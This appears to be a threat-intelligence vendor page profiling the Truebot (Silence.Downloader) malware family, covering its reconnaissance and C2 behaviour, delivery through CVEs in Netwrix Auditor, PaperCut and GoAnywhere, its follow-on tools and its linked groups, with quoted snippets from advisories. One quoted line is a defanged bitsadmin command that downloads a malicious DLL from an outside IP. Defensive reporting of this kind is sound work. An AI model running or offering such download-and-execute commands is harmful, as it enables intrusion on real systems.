Truebot, also known as Silence.Downloader, is a Windows malware downloader first identified in 2017 and attributed to the financially motivated Silence group. It provides early-stage reconnaissance and payload delivery, enabling subsequent remote access, data theft, and ransomware operations. Truebot has also been used in Cl0p-associated campaigns, including attacks involving vulnerable GoAnywhere MFT and PaperCut servers. Its targeting includes financial institutions and organizations across multiple sectors, with documented infections in education and campaigns affecting organizations in the United States and Canada.
Truebot collects screenshots and host information, including operating-system version, processor architecture, computer and domain names, running processes, security software, and Active Directory trust relationships. It establishes bidirectional command-and-control communication through HTTP POST requests and can download and execute executable, library, PowerShell, and batch payloads. Newer variants can load DLLs and shellcode directly in memory. Evasion measures include obfuscated infrastructure references, self-renaming, operational-file deletion, and extensive junk code intended to hinder detection and analysis.
Distribution methods include phishing attachments, malicious redirect links, purported software updates, and web-based downloads. Attackers have deployed Truebot through exploitation of CVE-2022-31199 in Netwrix Auditor and CVE-2023-27350 in PaperCut. Raspberry Robin infections originating from malicious USB devices have also delivered Truebot. Follow-on payloads include FlawedGrace and Cobalt Strike. In documented intrusions, these additional tools supported credential theft, persistence, lateral movement, and data exfiltration; attackers also used the custom Teleport exfiltration tool, and some operations culminated in Cl0p ransomware deployment.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Additionally, newer versions of Truebot malware allow malicious actors to gain initial access by exploiting a known vulnerability with Netwrix Auditor application (CVE-2022-31199). As recently as May 2023, cyber threat actors used this common vulnerability and exposure to deliver new Truebot malware variants and to collect and exfiltrate information against organizations in the U.S. and Canada.
Microsoft was able to identify the involvement of two ransomware gangs (CL0P and LockBit) who were exploiting the tracked CVE-2023-27350 and CVE-2023-27351.
The groups were able to exploit this vulnerability, successfully deploying the infamous TrueBot malware that had been used many months prior.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform.
8 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Huntress mentioned at that time the observation of an overlap with Truebot and Ta505 that could have been behind such attack campaign.
The groups were able to exploit this vulnerability, successfully deploying the infamous TrueBot malware that had been used many months prior.
Truebot is a first-stage downloader module that can collect system information and take screenshots, developed and attributed to the Silence hacking group.
Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
CISA, in coordination with the FBI, MS-ISAC, and CCCS, released a joint report on Truebot (aka. Silence) malware and a recently identified increase in infections targeting Canadian and US industries.
38 distinct techniques documented for this family, organized by ATT&CK tactic.
Cyber threat actors embed malicious links or attachments within web domains to gain initial access.
Cyber threat actors have shifted tactics, exploiting ... a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor.
In the hours after the initial infection, Truebot has also been observed deploying the Cobalt Strike red-team tool and using the Teleport tool to enable data exfiltration.
attackers leveraged it to run a PowerShell script that allows them to download and execute a file containing malicious payload
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
CVE-2023-27350 enables remote code execution (RCE); attackers leveraged it to run a PowerShell script that allows them to download and execute a file containing malicious payload analysts identified as the LockBit strain of ransomware.
This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts.
It uses a .JSONIP extension ... to create a thirteen character globally unique identifier (GUID).
Cyber threat actors hide Truebot malware as legitimate appearing file formats.
Truebot has been observed injecting Cobalt Strike beacons into memory ... in a dormant mode for the first few hours.
Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station.
the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe.
Truebot malware scans and enumerates the affected system’s domain names.
It checks the current version of the operating system (OS) with RtlGetVersion and processor architecture using GetNativeSystemInfo.
Synchronization with the compromised system’s internal clock to facilitate scheduling tasks.
This version collects additional information: a screenshot, the computer name, the local network name, and active directory trust relations.
The affected system’s computer and domain name ... along with the newly generated GUID, are sent to a hard-coded URL in a POST request.
the HTTP communication includes new fields to include the network name and trust relations data and it is sent as a POST request with a parameter “q=<base64 encoded data>”.
336 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
32 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware delivered after exploitation of PaperCut CVE-2023-27350 in activity attributed to Lace Tempest; used as an initial payload before follow-on Cobalt Strike deployment, reconnaissance, lateral movement, and data exfiltration.
Malware payload observed being distributed through Raspberry Robin access.
Malware installed during Clop attacks exploiting PaperCut servers in April 2023 and also used in its GoAnywhere attacks. The article does not describe Truebot's specific capabilities.
Named malware mentioned as appearing in the same subnets discussed; the content provides no additional technical description beyond this co-occurrence.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.